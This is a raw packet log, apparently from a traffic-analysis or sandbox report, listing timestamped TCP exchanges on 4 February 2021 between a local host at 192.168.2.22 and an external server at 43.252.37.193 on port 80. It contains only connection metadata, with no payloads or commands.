Feb 4, 2021 09:05:20.497781038 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.497822046 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.497966051 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.498677015 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.498764992 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.695539951 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.695676088 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.695696115 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.695712090 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.695725918 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.695738077 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.695755005 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.695839882 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.695851088 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.695856094 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.695878029 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.695889950 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.696054935 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.696074963 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.696086884 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.696103096 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.696115971 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.696139097 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.696168900 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.892484903 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.892543077 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.892570019 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.892592907 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.892683983 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.892786026 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.892812967 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.892829895 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.892846107 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.892863989 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.892880917 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.892896891 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.892904043 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.892919064 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.892923117 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.892940044 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.892971039 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.089693069 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.089723110 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.089744091 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.089765072 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.089785099 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.089807034 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.089828968 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.089848995 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.089870930 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.089880943 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.089895010 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.089914083 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.089917898 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.089919090 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.089920998 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.089943886 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.089948893 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.089958906 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.089962006 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.286555052 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.286582947 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.286602020 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.286621094 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.286637068 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.286638021 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.286670923 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.286686897 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.286695004 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.286704063 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.286709070 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.286716938 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.286767960 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.286773920 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.286783934 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.286787033 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.286815882 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.286848068 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.483735085 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.483804941 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.483818054 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.483838081 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.483886003 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.483887911 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.483908892 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.483910084 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.483941078 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.483942032 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.483961105 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.483968973 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.483989000 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.484008074 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.484008074 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.484050035 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.484081984 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.484220982 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.680624962 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.680655003 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.680674076 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.680691004 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.680692911 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.680717945 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.680731058 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.680732965 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.680778027 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.680778980 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.680793047 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.680794954 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.680813074 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.680826902 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.680843115 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.680864096 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.877788067 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.877942085 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.877981901 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.878026009 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.878053904 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.878072977 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.878081083 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.878091097 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.878098011 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.878108978 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.878140926 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.878143072 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.878151894 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.878175020 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.878199100 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.878201008 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.878216982 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.878228903 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:21.878242016 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:21.878292084 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:22.075105906 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.075162888 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.075198889 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.075238943 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.075285912 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.075310946 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:22.075320005 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.075349092 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:22.075351954 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:22.075354099 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:22.075356960 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.075382948 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:22.075412989 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:22.075419903 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:22.272085905 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.272270918 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.272319078 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.272319078 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:22.272341013 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.272350073 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:22.272361994 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.272380114 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.272396088 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.272417068 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.272444963 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:22.272489071 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:22.272491932 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:22.276228905 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:22.469219923 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.469275951 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.469314098 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.469367981 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:22.469399929 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:22.469441891 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.469497919 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.469511032 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:22.469551086 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.469552040 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:22.469602108 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:22.469609022 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.469665051 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:22.473026991 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.473102093 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:22.667119980 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.667180061 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.667218924 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.667254925 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.667303085 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.667309999 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:22.667341948 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:22.667346001 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:22.667345047 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.667375088 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:22.667381048 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:22.667387009 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.667443991 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:22.667471886 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:22.866707087 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.866789103 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.866822958 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.866853952 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.866894960 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:22.867033958 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:22.867105007 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:23.066678047 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:23.066750050 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:23.066806078 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:23.066864014 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:23.066874027 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:23.066916943 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:23.066924095 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:23.066946983 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:23.067019939 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:23.067078114 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:23.067122936 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:23.067147017 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:23.264010906 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:23.264045954 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:23.264070034 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:23.264224052 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:23.264296055 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:23.264303923 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:23.462429047 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:23.462460041 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:23.462481976 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:23.462498903 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:23.462709904 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:23.462743044 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:23.462748051 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:23.462752104 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:23.659801006 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:23.659842968 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:23.659868002 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:23.659889936 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:23.659915924 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:23.660018921 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:23.661626101 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:23.856805086 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:23.856853008 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:23.856878996 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:23.856887102 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:23.856899977 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:23.856934071 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:23.856940031 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:23.856944084 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:24.054081917 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:24.054131985 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:24.054169893 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:24.054208994 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:24.054284096 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:24.054323912 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:24.251398087 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:24.251472950 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:24.251518965 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:24.251568079 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:24.251604080 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:24.251635075 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:24.251636028 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:24.251672029 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:24.251684904 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:24.251692057 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:24.251784086 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:24.448950052 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:24.449004889 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:24.449054003 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:24.449096918 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:24.449114084 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:24.449135065 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:24.449141026 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:24.449174881 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:24.449202061 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:24.449233055 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:24.646127939 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:24.646198034 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:24.646240950 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:24.646279097 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:24.646317959 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:24.646356106 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:24.646491051 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:24.646542072 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:24.843518972 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:24.843595982 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:24.843626022 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:24.843677998 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:24.843722105 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:24.843943119 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:25.040920973 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:25.040970087 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:25.041012049 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:25.041053057 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:25.041090012 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:25.041129112 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:25.041184902 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:25.041246891 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:25.041254044 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:25.041260004 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:25.041265011 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:25.041269064 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:25.238148928 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:25.238223076 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:25.238307953 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:25.238364935 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:25.238375902 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:25.238440990 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:25.238449097 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:25.238454103 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:25.435616016 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:25.435673952 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:25.435714960 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:25.435769081 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:25.435919046 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:25.437505960 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:25.632719040 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:25.632740974 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:25.632761002 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:25.632873058 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:25.632951021 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:25.634357929 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:25.634409904 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:25.634463072 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:25.634562016 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:25.829803944 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:25.829883099 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:25.829888105 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:25.829936981 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:25.831154108 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:25.831182957 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:25.831221104 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:25.831248045 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:26.026729107 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:26.026794910 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:26.027081013 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:26.027151108 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:26.224205971 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:26.224313974 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:26.225485086 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:26.225577116 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:26.421102047 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:26.421133995 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:26.421195030 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:26.421359062 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:26.422441006 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:26.422508955 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:26.618031025 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:26.618092060 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:26.618175030 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:26.618177891 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:26.618272066 CET	49165	80	192.168.2.22	43.252.37.193
